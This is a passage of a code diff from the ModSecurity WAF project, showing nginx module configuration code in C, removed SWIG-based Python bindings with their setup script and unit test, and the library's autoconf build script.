mmcf = (ngx_http_modsecurity_main_conf_t *) conf;
|
||||
|
||||
ngx_log_error(NGX_LOG_NOTICE, cf->log, 0,
|
||||
"%s (rules loaded inline/local/remote: %ui/%ui/%ui)",
|
||||
MODSECURITY_NGINX_WHOAMI, mmcf->rules_inline,
|
||||
mmcf->rules_file, mmcf->rules_remote);
|
||||
|
||||
return NGX_CONF_OK;
|
||||
}
|
||||
|
||||
|
||||
static void *
|
||||
ngx_http_modsecurity_create_conf(ngx_conf_t *cf)
|
||||
{
|
||||
ngx_pool_cleanup_t *cln;
|
||||
ngx_http_modsecurity_conf_t *conf;
|
||||
|
||||
conf = (ngx_http_modsecurity_conf_t *) ngx_pcalloc(cf->pool,
|
||||
sizeof(ngx_http_modsecurity_conf_t));
|
||||
|
||||
if (conf == NULL)
|
||||
{
|
||||
dd("Failed to allocate space for ModSecurity configuration");
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
/*
|
||||
* set by ngx_pcalloc():
|
||||
*
|
||||
* conf->enable = 0;
|
||||
* conf->sanity_checks_enabled = 0;
|
||||
* conf->rules_set = NULL;
|
||||
* conf->pool = NULL;
|
||||
* conf->transaction_id = NULL;
|
||||
*/
|
||||
|
||||
conf->enable = NGX_CONF_UNSET;
|
||||
conf->rules_set = msc_create_rules_set();
|
||||
conf->pool = cf->pool;
|
||||
conf->transaction_id = NGX_CONF_UNSET_PTR;
|
||||
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
|
||||
conf->sanity_checks_enabled = NGX_CONF_UNSET;
|
||||
#endif
|
||||
|
||||
cln = ngx_pool_cleanup_add(cf->pool, 0);
|
||||
if (cln == NULL) {
|
||||
dd("failed to create the ModSecurity configuration cleanup");
|
||||
return NGX_CONF_ERROR;
|
||||
}
|
||||
|
||||
cln->handler = ngx_http_modsecurity_cleanup_rules;
|
||||
cln->data = conf;
|
||||
|
||||
dd ("conf created at: '%p'", conf);
|
||||
|
||||
return conf;
|
||||
}
|
||||
|
||||
|
||||
static char *
|
||||
ngx_http_modsecurity_merge_conf(ngx_conf_t *cf, void *parent, void *child)
|
||||
{
|
||||
ngx_http_modsecurity_conf_t *p = parent;
|
||||
ngx_http_modsecurity_conf_t *c = child;
|
||||
#if defined(MODSECURITY_DDEBUG) && (MODSECURITY_DDEBUG)
|
||||
ngx_http_core_loc_conf_t *clcf = ngx_http_conf_get_module_loc_conf(cf, ngx_http_core_module);
|
||||
#endif
|
||||
int rules;
|
||||
const char *error = NULL;
|
||||
|
||||
dd("merging loc config [%s] - parent: '%p' child: '%p'",
|
||||
ngx_str_to_char(clcf->name, cf->pool), parent,
|
||||
child);
|
||||
|
||||
dd(" state - parent: '%d' child: '%d'",
|
||||
(int) c->enable, (int) p->enable);
|
||||
|
||||
ngx_conf_merge_value(c->enable, p->enable, 0);
|
||||
ngx_conf_merge_ptr_value(c->transaction_id, p->transaction_id, NULL);
|
||||
#if defined(MODSECURITY_SANITY_CHECKS) && (MODSECURITY_SANITY_CHECKS)
|
||||
ngx_conf_merge_value(c->sanity_checks_enabled, p->sanity_checks_enabled, 0);
|
||||
#endif
|
||||
|
||||
#if defined(MODSECURITY_DDEBUG) && (MODSECURITY_DDEBUG)
|
||||
dd("PARENT RULES");
|
||||
msc_rules_dump(p->rules_set);
|
||||
dd("CHILD RULES");
|
||||
msc_rules_dump(c->rules_set);
|
||||
#endif
|
||||
rules = msc_rules_merge(c->rules_set, p->rules_set, &error);
|
||||
|
||||
if (rules < 0) {
|
||||
return strdup(error);
|
||||
}
|
||||
|
||||
#if defined(MODSECURITY_DDEBUG) && (MODSECURITY_DDEBUG)
|
||||
dd("NEW CHILD RULES");
|
||||
msc_rules_dump(c->rules_set);
|
||||
#endif
|
||||
return NGX_CONF_OK;
|
||||
}
|
||||
|
||||
|
||||
static void
|
||||
ngx_http_modsecurity_cleanup_instance(void *data)
|
||||
{
|
||||
ngx_pool_t *old_pool;
|
||||
ngx_http_modsecurity_main_conf_t *mmcf;
|
||||
|
||||
mmcf = (ngx_http_modsecurity_main_conf_t *) data;
|
||||
|
||||
dd("deleting a main conf -- instance is: \"%p\"", mmcf->modsec);
|
||||
|
||||
old_pool = ngx_http_modsecurity_pcre_malloc_init(mmcf->pool);
|
||||
msc_cleanup(mmcf->modsec);
|
||||
ngx_http_modsecurity_pcre_malloc_done(old_pool);
|
||||
}
|
||||
|
||||
|
||||
static void
|
||||
ngx_http_modsecurity_cleanup_rules(void *data)
|
||||
{
|
||||
ngx_pool_t *old_pool;
|
||||
ngx_http_modsecurity_conf_t *mcf;
|
||||
|
||||
mcf = (ngx_http_modsecurity_conf_t *) data;
|
||||
|
||||
dd("deleting a loc conf -- RuleSet is: \"%p\"", mcf->rules_set);
|
||||
|
||||
old_pool = ngx_http_modsecurity_pcre_malloc_init(mcf->pool);
|
||||
msc_rules_cleanup(mcf->rules_set);
|
||||
ngx_http_modsecurity_pcre_malloc_done(old_pool);
|
||||
}
|
||||
|
||||
|
||||
/* vi:set ft=c ts=4 sw=4 et fdm=marker: */
|
|
@ -1,10 +0,0 @@
|
|||
# Introduction
|
||||
|
||||
The following are a set of Swig generated Python bindings for libmodsecurity. These bindings will allow users to utilize the exposed libmodsecurity interfaces directly from python, without the use of ctypes.
|
||||
|
||||
# Compilation
|
||||
|
||||
Although these are python scripts DO NOT use setup.py to compile this. Instead, one should use the Makefile in order to compile these. This can be done by typing 'make'. Be aware that the Python development headers are required to build this package. These can be obtained on RHEL via 'dnf install python-devel'
|
||||
|
||||
|
||||
|
|
@ -1 +0,0 @@
|
|||
from modsecurity import *
|
|
@ -1,63 +0,0 @@
|
|||
/*
|
||||
* ModSecurity, http://www.modsecurity.org/
|
||||
* Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
|
||||
*
|
||||
* You may not use this file except in compliance with
|
||||
* the License. You may obtain a copy of the License at
|
||||
*
|
||||
* http://www.apache.org/licenses/LICENSE-2.0
|
||||
*
|
||||
* If any of the files related to licensing are missing or if you have any
|
||||
* other questions related to licensing please contact Trustwave Holdings, Inc.
|
||||
* directly using the email address security@modsecurity.org.
|
||||
*
|
||||
* Author: Felipe "Zimmerle" Costa <fcosta at trustwave dot com>
|
||||
*
|
||||
*/
|
||||
|
||||
%module modsecurity
|
||||
|
||||
%include "std_string.i"
|
||||
%include "std_vector.i"
|
||||
%include "std_sstream.i"
|
||||
%include "attribute.i"
|
||||
%include "carrays.i"
|
||||
%include "typemaps.i"
|
||||
|
||||
#%ignore RulesProperties::parserError;
|
||||
|
||||
%{
|
||||
#include "modsecurity/intervention.h"
|
||||
#include "modsecurity/transaction/variable.h"
|
||||
#include "modsecurity/transaction/variables.h"
|
||||
#include "modsecurity/transaction/collection.h"
|
||||
#include "modsecurity/transaction/collections.h"
|
||||
#include "modsecurity/transaction.h"
|
||||
#include "modsecurity/debug_log.h"
|
||||
#include "modsecurity/modsecurity.h"
|
||||
#include "modsecurity/rules_properties.h"
|
||||
#include "modsecurity/rules.h"
|
||||
#include "modsecurity/rule.h"
|
||||
|
||||
using std::basic_string;
|
||||
%}
|
||||
|
||||
%ignore modsecurity::RulesProperties::parserError const;
|
||||
|
||||
%include "modsecurity/intervention.h"
|
||||
%include "modsecurity/transaction/variable.h"
|
||||
%include "modsecurity/transaction/variables.h"
|
||||
%include "modsecurity/transaction/collection.h"
|
||||
%include "modsecurity/transaction/collections.h"
|
||||
%include "modsecurity/transaction.h"
|
||||
%include "modsecurity/debug_log.h"
|
||||
%include "modsecurity/modsecurity.h"
|
||||
%include "modsecurity/rules_properties.h"
|
||||
%include "modsecurity/rules.h"
|
||||
%include "modsecurity/rule.h"
|
||||
|
||||
|
||||
%template(RuleVector) std::vector<modsecurity::Rule *>;
|
||||
%template(VectorOfRuleVector) std::vector<std::vector<modsecurity::Rule *> >;
|
||||
%template(StringVector) std::vector<std::string>;
|
||||
|
|
@ -1,107 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
"""
|
||||
|
||||
ModSecurity, http://www.modsecurity.org/
|
||||
Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
|
||||
|
||||
You may not use this file except in compliance with
|
||||
the License. You may obtain a copy of the License at
|
||||
|
||||
http://www.apache.org/licenses/LICENSE-2.0
|
||||
|
||||
If any of the files related to licensing are missing or if you have any
|
||||
other questions related to licensing please contact Trustwave Holdings, Inc.
|
||||
directly using the email address security@modsecurity.org.
|
||||
|
||||
Author: Felipe "Zimmerle" Costa <fcosta at trustwave dot com>
|
||||
|
||||
"""
|
||||
|
||||
from distutils.core import setup, Extension
|
||||
import os
|
||||
import sys
|
||||
|
||||
possible_modsecurity_dirs = [
|
||||
"/usr/local/modsecurity/",
|
||||
"/usr/",
|
||||
"/usr/local/"
|
||||
]
|
||||
|
||||
libraries_dir = [
|
||||
"lib/",
|
||||
"lib64/"
|
||||
]
|
||||
|
||||
headers_dir = [
|
||||
"include/",
|
||||
"headers/",
|
||||
"./"
|
||||
]
|
||||
|
||||
def find_modsec():
|
||||
for i in possible_modsecurity_dirs:
|
||||
lib = None
|
||||
inc = None
|
||||
|
||||
for j in libraries_dir:
|
||||
p = os.path.join(i, j, "libmodsecurity.so")
|
||||
if os.path.isfile(p) or os.path.islink(p):
|
||||
lib = os.path.join(i, j)
|
||||
|
||||
for x in headers_dir:
|
||||
p = os.path.join(i, x, os.path.join("modsecurity", "modsecurity.h"))
|
||||
if os.path.isfile(p) or os.path.islink(p):
|
||||
inc = os.path.join(i, x)
|
||||
|
||||
if inc != None and lib != None:
|
||||
return (inc, lib)
|
||||
|
||||
return (None, None)
|
||||
|
||||
inc_dir, lib_dir = find_modsec()
|
||||
|
||||
|
||||
print "*** found modsecurity at:"
|
||||
print " headers: " + str(inc_dir)
|
||||
print " library: " + str(lib_dir)
|
||||
|
||||
|
||||
if inc_dir == None or lib_dir == None:
|
||||
print "libModSecurity was not found in your system."
|
||||
print "Make sure you have libModSecurity correctly installed in your system."
|
||||
sys.exit(1)
|
||||
|
||||
|
||||
#if os.path.isfile("modsecurity/_modsecurity_module.cc") == False:
|
||||
# print "Swig generated code was not found. Please run `make' first"
|
||||
# sys.exit(1)
|
||||
|
||||
|
||||
extension_mod = Extension(
|
||||
"_modsecurity", [
|
||||
"modsecurity/modsecurity_wrap.cxx"
|
||||
],
|
||||
libraries=["modsecurity"],
|
||||
swig_opts=['-Wextra', '-builtin'],
|
||||
library_dirs=[lib_dir],
|
||||
runtime_library_dirs=[lib_dir],
|
||||
include_dirs=[inc_dir, "."],
|
||||
extra_compile_args=["-std=c++11"]
|
||||
)
|
||||
|
||||
|
||||
setup(
|
||||
name = "modsecurity",
|
||||
description = 'Python Bindings for libModSecurity',
|
||||
author = 'Felipe Zimmerle',
|
||||
author_email = 'felipe@zimmerle.org',
|
||||
url = 'https://github.com/SpiderLabs/ModSecurity-Python-bindings',
|
||||
ext_modules = [extension_mod],
|
||||
packages = ['modsecurity'],
|
||||
classifiers = [
|
||||
'Topic :: Security',
|
||||
'Topic :: Internet :: WWW/HTTP'
|
||||
]
|
||||
)
|
||||
|
||||
|
|
@ -1,54 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
"""
|
||||
|
||||
ModSecurity, http://www.modsecurity.org/
|
||||
Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/)
|
||||
|
||||
You may not use this file except in compliance with
|
||||
the License. You may obtain a copy of the License at
|
||||
|
||||
http://www.apache.org/licenses/LICENSE-2.0
|
||||
|
||||
If any of the files related to licensing are missing or if you have any
|
||||
other questions related to licensing please contact Trustwave Holdings, Inc.
|
||||
directly using the email address security@modsecurity.org.
|
||||
|
||||
Author: Felipe "Zimmerle" Costa <fcosta at trustwave dot com>
|
||||
|
||||
"""
|
||||
|
||||
import sys
|
||||
import unittest
|
||||
|
||||
sys.path.append("..")
|
||||
sys.path.append(".")
|
||||
import modsecurity
|
||||
|
||||
|
||||
class TestStringMethods(unittest.TestCase):
|
||||
|
||||
def test_version(self):
|
||||
self.assertRegexpMatches(str(modsecurity.ModSecurity().whoAmI()), ".*ModSecurity.*")
|
||||
|
||||
def test_load_rules(self):
|
||||
rules = modsecurity.Rules()
|
||||
ret = rules.load('SecRule ARGS_POST|XML:/* "(\n|\r)" "id:1,deny,phase:2"')
|
||||
self.assertEqual(ret, 1)
|
||||
ret = rules.load("""
|
||||
SecRule ARGS_POST|XML:/* "(\n|\r)" "id:1,deny,phase:2"
|
||||
SecRule ARGS_POST|XML:/* "(\n|\r)" "id:2,deny,phase:2"
|
||||
""")
|
||||
self.assertEqual(ret, 2)
|
||||
ret = rules.getRulesForPhase(3)
|
||||
self.assertEqual(ret.size(), 3)
|
||||
|
||||
def test_load_bad_rules(self):
|
||||
rules = modsecurity.Rules()
|
||||
ret = rules.load('SecRule ARGS_POST|XML:/* "(\n|\r)" "deny,phase:2"')
|
||||
self.assertEqual(ret, -1)
|
||||
ret = rules.getParserError()
|
||||
self.assertRegexpMatches(ret, "Rules must have an ID.*")
|
||||
|
||||
if __name__ == '__main__':
|
||||
unittest.main()
|
||||
|
|
@ -1,639 +0,0 @@
|
|||
# ModSecurity configure.ac
|
||||
|
||||
|
||||
# Get the hash of the last commit, to be used if it is not an
|
||||
# official release.
|
||||
AC_DEFUN([MSC_GIT_HASH], m4_esyscmd_s(git log -1 --format="%h" --abbrev-commit))
|
||||
AC_DEFUN([MSC_MAJOR], m4_esyscmd_s(cat headers/modsecurity/modsecurity.h | grep "define MODSECURITY_MAJOR " | awk {'print $3'} | sed 's/\"//g'))
|
||||
AC_DEFUN([MSC_MINOR], m4_esyscmd_s(cat headers/modsecurity/modsecurity.h | grep "define MODSECURITY_MINOR " | awk {'print $3'} | sed 's/\"//g'))
|
||||
AC_DEFUN([MSC_PATCHLEVEL], m4_esyscmd_s(cat headers/modsecurity/modsecurity.h | grep "define MODSECURITY_PATCHLEVEL " | awk {'print $3'} | sed 's/\"//g'))
|
||||
AC_DEFUN([MSC_TAG], m4_esyscmd_s(cat headers/modsecurity/modsecurity.h | grep "define MODSECURITY_FTAG " | awk {'print $3'} | sed 's/\"//g'))
|
||||
|
||||
|
||||
# Version definition to be further used by AC_INIT and
|
||||
# .so file naming.
|
||||
m4_define([msc_version_major], [MSC_MAJOR])
|
||||
m4_define([msc_version_minor], [MSC_MINOR])
|
||||
m4_define([msc_version_patchlevel], [MSC_PATCHLEVEL])
|
||||
|
||||
m4_define([msc_version_c_plus_a], [m4_eval(msc_version_major + msc_version_minor)])
|
||||
|
||||
|
||||
m4_define([msc_version],
|
||||
[msc_version_major.msc_version_minor])
|
||||
|
||||
m4_define([msc_version_with_patchlevel],
|
||||
[msc_version_major.msc_version_minor.msc_version_patchlevel])
|
||||
|
||||
m4_define([msc_version_git],
|
||||
[m4_esyscmd_s(git describe)])
|
||||
|
||||
m4_define([msc_version_info],
|
||||
[msc_version_c_plus_a:msc_version_patchlevel:msc_version_minor])
|
||||
|
||||
|
||||
# Project Information
|
||||
AC_INIT([modsecurity], [3.0], [security@modsecurity.org])
|
||||
|
||||
|
||||
# General definitions
|
||||
AC_CONFIG_MACRO_DIR([build])
|
||||
AC_PREFIX_DEFAULT([/usr/local/modsecurity])
|
||||
|
||||
|
||||
# General automake options.
|
||||
AM_INIT_AUTOMAKE([-Wall -Werror foreign subdir-objects])
|
||||
|
||||
|
||||
# Check for dependencies (C++, AR, Lex, Yacc and Make)
|
||||
AC_PROG_CXX
|
||||
AM_PROG_AR
|
||||
AC_PROG_MAKE_SET
|
||||
PKG_PROG_PKG_CONFIG
|
||||
|
||||
|
||||
# Check if the compiler is c++11 compatible.
|
||||
# AX_CXX_COMPILE_STDCXX_11(,mandatory)
|
||||
|
||||
# Check for libinjection
|
||||
if ! test -f "${srcdir}/others/libinjection/src/libinjection_html5.c"; then
|
||||
AC_MSG_ERROR([\
|
||||
|
||||
|
||||
libInjection was not found within ModSecurity source directory.
|
||||
|
||||
libInjection code is available as part of ModSecurity source code in a format
|
||||
of a git-submodule. git-submodule allow us to specify the correct version of
|
||||
libInjection and still uses the libInjection repository to download it.
|
||||
|
||||
You can download libInjection using git:
|
||||
|
||||
$ git submodule init
|
||||
$ git submodule update
|
||||
|
||||
])
|
||||
fi
|
||||
# Libinjection version
|
||||
AC_DEFUN([LIBINJECTION_VERSION], m4_esyscmd_s(cd "others/libinjection" && git describe && cd ../..))
|
||||
|
||||
# SecLang test version
|
||||
AC_DEFUN([SECLANG_TEST_VERSION], m4_esyscmd_s(cd "test/test-cases/secrules-language-tests" && git log -1 --format="%h" --abbrev-commit && cd ../../..))
|
||||
|
||||
|
||||
# Check for yajl
|
||||
PROG_YAJL
|
||||
|
||||
AM_CONDITIONAL([YAJL_VERSION], [test "$YAJL_VERSION" != ""])
|
||||
|
||||
# Check for LibGeoIP
|
||||
PROG_GEOIP
|
||||
AM_CONDITIONAL([GEOIP_CFLAGS], [test "GEOIP_CFLAGS" != ""])
|
||||
|
||||
# Check for MaxMind
|
||||
PROG_MAXMIND
|
||||
AM_CONDITIONAL([MAXMIND_CFLAGS], [test "MAXMIND_CFLAGS" != ""])
|
||||
|
||||
|
||||
# Check for LMDB
|
||||
PROG_LMDB
|
||||
AM_CONDITIONAL([LMDB_CFLAGS], [test "LMDB_CFLAGS" != ""])
|
||||
|
||||
# Check for SSDEEP
|
||||
CHECK_SSDEEP
|
||||
AM_CONDITIONAL([SSDEEP_CFLAGS], [test "SSDEEP_CFLAGS" != ""])
|
||||
|
||||
# Check for LUA
|
||||
CHECK_LUA
|
||||
AM_CONDITIONAL([LUA_CFLAGS], [test "LUA_CFLAGS" != ""])
|
||||
|
||||
|
||||
#
|
||||
# Check for curl
|
||||
#
|
||||
CHECK_CURL
|
||||
|
||||
if ! test -z "${CURL_VERSION}"; then
|
||||
AC_DEFINE([MSC_WITH_CURL], [1], [Define if libcurl is available])
|
||||
fi
|
||||
|
||||
|
||||
#
|
||||
# Check for LibXML
|
||||
#
|
||||
CHECK_LIBXML2
|
||||
|
||||
|
||||
#
|
||||
# Check for libpcre
|
||||
#
|
||||
CHECK_PCRE
|
||||
|
||||
|
||||
#
|
||||
# Check for pcre2
|
||||
#
|
||||
PROG_PCRE2
|
||||
AM_CONDITIONAL([PCRE2_CFLAGS], [test "PCRE2_CFLAGS" != ""])
|
||||
|
||||
|
||||
# Checks for header files.
|
||||
AC_HEADER_STDC
|
||||
AC_CHECK_HEADERS([string])
|
||||
AC_CHECK_HEADERS([iostream])
|
||||
AC_CHECK_HEADERS([sys/utsname.h])
|
||||
|
||||
|
||||
# ??
|
||||
LT_INIT([dlopen])
|
||||
|
||||
# Identify platform
|
||||
AC_CANONICAL_HOST
|
||||
|
||||
case $host in
|
||||
*-*-aix*)
|
||||
echo "Checking platform... Identified as AIX"
|
||||
AC_DEFINE([AIX], [1], [Define if the operating system is AIX])
|
||||
PLATFORM="AIX"
|
||||
;;
|
||||
*-*-hpux*)
|
||||
echo "Checking platform... Identified as HPUX"
|
||||
AC_DEFINE([HPUX], [1], [Define if the operating system is HPUX])
|
||||
PLATFORM="HPUX"
|
||||
;;
|
||||
*-*-darwin*)
|
||||
echo "Checking platform... Identified as Macintosh OS X"
|
||||
AC_DEFINE([MACOSX], [1], [Define if the operating system is Macintosh OSX])
|
||||
PLATFORM="MacOSX"
|
||||
;;
|
||||
*-*-linux* | *-*uclinux*)
|
||||
echo "Checking platform... Identified as Linux"
|
||||
AC_DEFINE([LINUX], [1], [Define if the operating system is LINUX])
|
||||
PLATFORM="Linux"
|
||||
;;
|
||||
*-*-solaris*)
|
||||
echo "Checking platform... Identified as Solaris"
|
||||
AC_DEFINE([SOLARIS], [1], [Define if the operating system is SOLARIS])
|
||||
PLATFORM="Solaris"
|
||||
;;
|
||||
*-*-freebsd*)
|
||||
echo "Checking platform... Identified as FreeBSD"
|
||||
AC_DEFINE([FREEBSD], [1], [Define if the operating system is FREEBSD])
|
||||
PLATFORM="FreeBSD"
|
||||
;;
|
||||
*-*-netbsd*)
|
||||
echo "Checking platform... Identified as NetBSD"
|
||||
AC_DEFINE([NETBSD], [1], [Define if the operating system is NETBSD])
|
||||
PLATFORM="NetBSD"
|
||||
;;
|
||||
*-*-openbsd*)
|
||||
echo "Checking platform... Identified as OpenBSD"
|
||||
AC_DEFINE([OPENBSD], [1], [Define if the operating system is OPENBSD])
|
||||
PLATFORM="OpenBSD"
|
||||
;;
|
||||
*-*-kfreebsd*)
|
||||
echo "Checking platform... Identified as kFreeBSD, treating as linux"
|
||||
AC_DEFINE([FREEBSD], [1], [Define if the operating system is FREEBSD])
|
||||
PLATFORM="kFreeBSD"
|
||||
;;
|
||||
*-*-dragonfly*)
|
||||
echo "Checking platform... Identified as DragonFlyBSD, treating as linux"
|
||||
AC_DEFINE([DRAGONFLY], [1], [Define if the operating system is DRAGONFLY])
|
||||
PLATFORM="DragonFly"
|
||||
;;
|
||||
*-*-gnu*.*)
|
||||
echo "Checking platform... Identified as HURD, treating as linux"
|
||||
AC_DEFINE([LINUX], [1], [Define if the operating system is LINUX])
|
||||
PLATFORM="HURD"
|
||||
;;
|
||||
*)
|
||||
echo "Unknown CANONICAL_HOST $host"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
|
||||
# Variables to be used inside the Makefile.am files.
|
||||
MSC_BASE_DIR=`pwd`
|
||||
AC_SUBST([MSC_BASE_DIR])
|
||||
|
||||
MSC_VERSION_INFO=msc_version_info
|
||||
AC_SUBST([MSC_VERSION_INFO])
|
||||
|
||||
MSC_VERSION_WITH_PATCHLEVEL=msc_version_with_patchlevel
|
||||
AC_SUBST([MSC_VERSION_WITH_PATCHLEVEL])
|
||||
|
||||
MSC_VERSION=msc_version
|
||||
AC_SUBST([MSC_VERSION])
|
||||
|
||||
MSC_GIT_VERSION=msc_version_git
|
||||
AC_SUBST([MSC_GIT_VERSION])
|
||||
|
||||
|
||||
AC_ARG_ENABLE(debug-logs,
|
||||
[AS_HELP_STRING([--disable-debug-logs],[Turn off the SecDebugLog feature])],
|
||||
|
||||
[case "${enableval}" in
|
||||
yes) debugLogs=true ;;
|
||||
no) debugLogs=false ;;
|
||||
*) AC_MSG_ERROR(bad value ${enableval} for --enable-debug-logs) ;;
|
||||
esac],
|
||||
|
||||
[debugLogs=true]
|
||||
)
|
||||
if test "$debugLogs" != "true"; then
|
||||
MODSEC_NO_LOGS="-DNO_LOGS=1"
|
||||
AC_SUBST(MODSEC_NO_LOGS)
|
||||
fi
|
||||
|
||||
|
||||
# Fuzzer
|
||||
AC_ARG_ENABLE(afl-fuzz,
|
||||
[AS_HELP_STRING([--enable-afl-fuzz],[Turn on the afl fuzzer compilation utilities])],
|
||||
|
||||
[case "${enableval}" in
|
||||
yes) aflFuzzer=true ;;
|
||||
no) aflFuzzer=false ;;
|
||||
*) AC_MSG_ERROR(bad value ${enableval} for --enable-afl-fuzz) ;;
|
||||
esac],
|
||||
|
||||
[aflFuzzer=false]
|
||||
)
|
||||
|
||||
# Examples
|
||||
AC_ARG_ENABLE(examples,
|
||||
[AS_HELP_STRING([--enable-examples],[Turn on the examples compilation (default option)])],
|
||||
|
||||
[case "${enableval}" in
|
||||
yes) buildExamples=true ;;
|
||||
no) buildExamples=false ;;
|
||||
*) AC_MSG_ERROR(bad value ${enableval} for --enable-examples) ;;
|
||||
esac],
|
||||
|
||||
[buildExamples=true]
|
||||
)
|
||||
|
||||
# Parser
|
||||
AC_ARG_ENABLE(parser-generation,
|
||||
[AS_HELP_STRING([--enable-parser-generation],[Enables parser generation during the build])],
|
||||
|
||||
[case "${enableval}" in
|
||||
yes) buildParser=true ;;
|
||||
no) buildParser=false ;;
|
||||
*) AC_MSG_ERROR(bad value ${enableval} for --enable-parser-generation) ;;
|
||||
esac],
|
||||
|
||||
[buildParser=false]
|
||||
)
|
||||
|
||||
# Mutex
|
||||
AC_ARG_ENABLE(mutex-on-pm,
|
||||
[AS_HELP_STRING([--enable-mutex-on-pm],[Treats pm operations as a critical section])],
|
||||
|
||||
[case "${enableval}" in
|
||||
yes) mutexPm=true ;;
|
||||
no) mutexPm=false ;;
|
||||
*) AC_MSG_ERROR(bad value ${enableval} for --enable-mutex-on-pm) ;;
|
||||
esac],
|
||||
|
||||
[mutexPm=false]
|
||||
)
|
||||
if test "$mutexPm" == "true"; then
|
||||
MODSEC_MUTEX_ON_PM="-DMUTEX_ON_PM=1"
|
||||
AC_SUBST(MODSEC_MUTEX_ON_PM)
|
||||
fi
|
||||
|
||||
|
||||
if test $buildParser = true; then
|
||||
AC_PROG_YACC
|
||||
AC_PROG_LEX
|
||||
AC_PATH_PROG([FLEX], [flex])
|
||||
test "x$FLEX" = "x" && AC_MSG_ERROR([flex is needed to build ModSecurity])
|
||||
|
||||
AC_PATH_PROG([BISON], [bison])
|
||||
test "x$BISON" = "x" && AC_MSG_ERROR([bison is needed to build ModSecurity])
|
||||
|
||||
AC_PATH_PROG([YACC_INST], $YACC)
|
||||
if test ! -f "$srcdir/gram.c"; then
|
||||
if test -z "$YACC_INST"; then
|
||||
AC_MSG_ERROR([yacc not found - unable to compile ModSecurity])
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
|
||||
|
||||
# Decide if we want to build the tests or not.
|
||||
# buildTestUtilities=false
|
||||
# if test "x$YAJL_FOUND" = "x1"; then
|
||||
# Regression tests will not be able to run without the logging support.
|
||||
# But we still have the unit tests.
|
||||
# if test "$debugLogs" = "true"; then
|
||||
# buildTestUtilities=true
|
||||
# fi
|
||||
# fi
|
||||
|
||||
|
||||
AM_CONDITIONAL([TEST_UTILITIES], [test $buildTestUtilities = true])
|
||||
if test $buildTestUtilities = true; then
|
||||
if test $debugLogs = true; then
|
||||
if test -f ./test/test-list.sh; then
|
||||
TEST_CASES=`./test/test-list.sh`
|
||||
fi
|
||||
fi
|
||||
fi
|
||||
|
||||
AM_CONDITIONAL([EXAMPLES], [test $buildExamples = true])
|
||||
AM_CONDITIONAL([BUILD_PARSER], [test $buildParser = true])
|
||||
AM_CONDITIONAL([USE_MUTEX_ON_PM], [test $mutexPm = true])
|
||||
|
||||
|
||||
# General link options
|
||||
if test "$PLATFORM" != "MacOSX" -a "$PLATFORM" != "OpenBSD"; then
|
||||
GLOBAL_LDADD="-lrt "
|
||||
fi
|
||||
|
||||
if test "$aflFuzzer" == "true"; then
|
||||
FUZZ_CPPCFLAGS="-fsanitize=address -fsanitize-coverage=4 "
|
||||
GLOBAL_LDADD="$GLOBAL_LDADD -fsanitize=address "
|
||||
GLOBAL_CPPFLAGS="$GLOBAL_CPPFLAGS $FUZZ_CPPCFLAGS"
|
||||
$buildExamples = false
|
||||
fi
|
||||
AC_SUBST(GLOBAL_LDADD)
|
||||
AC_SUBST(GLOBAL_CPPFLAGS)
|
||||
|
||||
AM_CONDITIONAL([AFL_FUZZER], [test $aflFuzzer = true])
|
||||
|
||||
GLOBAL_CFLAGS=""
|
||||
AC_SUBST(GLOBAL_CFLAGS)
|
||||
|
||||
# Files to be generated via autotools.
|
||||
AC_CONFIG_FILES([\
|
||||
modsecurity.pc \
|
||||
Makefile \
|
||||
doc/Makefile \
|
||||
src/Makefile \
|
||||
others/Makefile \
|
||||
tools/Makefile \
|
||||
tools/rules-check/Makefile
|
||||
])
|
||||
|
||||
AM_COND_IF([TEST_UTILITIES],
|
||||
[AC_CONFIG_FILES([test/Makefile test/benchmark/Makefile])])
|
||||
|
||||
AM_COND_IF([EXAMPLES],
|
||||
[AC_CONFIG_FILES([ \
|
||||
examples/Makefile \
|
||||
examples/simple_example_using_c/Makefile \
|
||||
examples/multiprocess_c/Makefile \
|
||||
examples/reading_logs_with_offset/Makefile \
|
||||
examples/reading_logs_via_rule_message/Makefile \
|
||||
examples/using_bodies_in_chunks/Makefile \
|
||||
])])
|
||||
|
||||
AM_COND_IF([AFL_FUZZER],
|
||||
[AC_CONFIG_FILES([test/fuzzer/Makefile])])
|
||||
|
||||
AM_COND_IF([BUILD_PARSER],
|
||||
[AC_CONFIG_FILES([src/parser/Makefile])])
|
||||
|
||||
|
||||
AC_CONFIG_HEADERS([src/config.h])
|
||||
|
||||
|
||||
# Doxygen support
|
||||
DX_HTML_FEATURE(ON)
|
||||
DX_CHM_FEATURE(OFF)
|
||||
DX_CHI_FEATURE(OFF)
|
||||
DX_MAN_FEATURE(OFF)
|
||||
DX_RTF_FEATURE(OFF)
|
||||
DX_XML_FEATURE(OFF)
|
||||
DX_PDF_FEATURE(OFF)
|
||||
DX_PS_FEATURE(OFF)
|
||||
|
||||
DX_INIT_DOXYGEN([ModSecurity],[doc/doxygen.cfg])
|
||||
|
||||
# make check-valgrind
|
||||
AX_VALGRIND_DFLT([sgcheck], [off])
|
||||
AX_VALGRIND_CHECK
|
||||
|
||||
# Generate the files.
|
||||
AC_OUTPUT
|
||||
|
||||
|
||||
# Print a fancy summary
|
||||
echo " "
|
||||
echo " "
|
||||
echo "ModSecurity - ${MSC_GIT_VERSION} for $PLATFORM"
|
||||
echo " "
|
||||
echo " Mandatory dependencies"
|
||||
echo -n " + libInjection ...."
|
||||
echo LIBINJECTION_VERSION
|
||||
echo -n " + SecLang tests ...."
|
||||
echo SECLANG_TEST_VERSION
|
||||
|
||||
echo " "
|
||||
echo " Optional dependencies"
|
||||
|
||||
|
||||
|
||||
## GeoIP - MaxMind
|
||||
if test "x$GEOIP_FOUND" = "x0" && test "x$MAXMIND_FOUND" = "x0"; then
|
||||
echo " + GeoIP/MaxMind ....not found"
|
||||
fi
|
||||
if test "x$GEOIP_FOUND" = "x1" || test "x$MAXMIND_FOUND" = "x1"; then
|
||||
echo -n " + GeoIP/MaxMind ....found "
|
||||
echo ""
|
||||
